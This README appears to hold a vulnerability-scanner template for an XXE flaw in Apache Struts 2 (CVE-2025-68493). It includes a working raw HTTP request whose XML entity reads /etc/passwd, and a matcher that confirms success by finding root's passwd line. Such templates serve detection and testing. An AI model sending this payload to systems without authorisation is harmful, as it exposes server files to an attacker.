README.md
Rendering markdown...
id: CVE-2025-68493
info:
name: Apache Struts 2 - XML External Entity (XXE) Injection
author: manus
severity: high
description: |
Apache Struts 2 is vulnerable to XXE injection via the DomHelper.parse method.
An attacker can exploit this to read arbitrary files from the server.
reference:
- https://zone.ci/secarticles/wx/486533.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-68493
tags: cve,cve2025,struts2,xxe,apache
http:
- raw:
- |
POST /struts2-xml-parser/xmlParserNoDtdParse HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200